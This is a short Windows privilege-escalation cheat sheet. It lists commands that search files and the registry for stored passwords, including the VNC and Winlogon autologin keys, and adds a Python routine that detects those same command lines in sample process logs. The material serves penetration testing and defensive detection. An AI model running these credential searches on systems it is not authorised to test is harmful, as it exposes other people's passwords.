manual techniques for privilege escalation

Information Gathering

The first step should always be situational awareness: understand what is on the host. Run these commands first to understand what you are up against.

Windows Situational Awareness Guide

Common commands

Find passwords/config files

dir /s *pass* == *cred* == *vnc* == *.config*

findstr /si password *.xml *.ini *.txt

/i - case-insensitive match, /s - search subdirectories

reg query HKLM /f password /t REG_SZ /s (repeat with HKCU for the current user's hive)

Find password in registry

reg query HKLM /f password /t REG_SZ /s > HKLM.txt

reg query HKCU /f password /t REG_SZ /s > HKCU.txt

**Note:** be careful querying the registry, as there is usually alerting tied to it.

VNC

reg query "HKCU\Software\ORL\WinVNC3\Password"

Windows autologin

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
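The note above says registry queries usually trip alerting; as an added example from the defender's side (not code from the original page), here is a Python triage routine that flags the credential-hunting command lines listed on this page in process-creation telemetry. The flattened "User|Image|CommandLine" event format and the sample events are constructed for the example; real Sysmon Event ID 1 or Security 4688 records would be parsed from their XML/JSON first.

```python
import re
from typing import List, Tuple

# Constructed sample process-creation events (Sysmon Event ID 1 style,
# flattened to "User|Image|CommandLine"); not real telemetry.
SAMPLE_EVENTS = [
    r"CORP\jdoe|C:\Windows\System32\reg.exe|reg query HKLM /f password /t REG_SZ /s",
    r'CORP\jdoe|C:\Windows\System32\reg.exe|reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"',
    r"CORP\svc_backup|C:\Windows\System32\reg.exe|reg query HKLM\SOFTWARE\Vendor\App /v Version",
    r"CORP\jdoe|C:\Windows\System32\findstr.exe|findstr /si password *.xml *.ini *.txt",
    r"CORP\jdoe|C:\Windows\System32\cmd.exe|dir /s *pass* == *cred* == *vnc* == *.config*",
    r"CORP\alice|C:\Windows\System32\cmd.exe|dir /s *.log",
]

# Search terms and registry keys taken from the commands on this page.
CRED_TERMS = re.compile(r"pass|cred|vnc|\.config", re.I)
CRED_KEYS = re.compile(r"\\Winlogon\b|\\WinVNC3\b", re.I)
REG_QUERY = re.compile(r"\breg(?:\.exe)?\s+query\b", re.I)
REG_SEARCH = re.compile(r"\breg(?:\.exe)?\s+query\b.*\s/f\s+(\S+)", re.I)
FINDSTR_SEARCH = re.compile(r"\bfindstr(?:\.exe)?\s+((?:/\S+\s+)*)(\S+)", re.I)
DIR_RECURSIVE = re.compile(r"\bdir\b.*\s/s\b", re.I)


def classify(command_line: str) -> List[str]:
    """Return the names of the detection rules a command line triggers."""
    hits = []
    m = REG_SEARCH.search(command_line)
    if m and CRED_TERMS.search(m.group(1)):          # reg query ... /f password ... /s
        hits.append("registry_recursive_credential_search")
    if REG_QUERY.search(command_line) and CRED_KEYS.search(command_line):
        hits.append("credential_bearing_key_read")   # Winlogon / WinVNC3 keys read directly
    m = FINDSTR_SEARCH.search(command_line)
    if m and "s" in m.group(1).lower() and CRED_TERMS.search(m.group(2)):
        hits.append("recursive_file_content_credential_search")
    if DIR_RECURSIVE.search(command_line) and CRED_TERMS.search(command_line):
        hits.append("recursive_file_name_credential_search")
    return hits


def scan(events: List[str]) -> List[Tuple[str, str]]:
    """Parse flattened events and return (user, rule) pairs for every hit."""
    findings = []
    for event in events:
        user, _image, cmd = event.split("|", 2)
        for rule in classify(cmd):
            findings.append((user, rule))
    return findings


if __name__ == "__main__":
    for user, rule in scan(SAMPLE_EVENTS):
        print(f"{user}: {rule}")
```

Benign administrative use of reg query and dir /s (the svc_backup and alice events) produces no finding; the rules key on the recursive search flags combined with credential-related terms or keys, not on the tool alone.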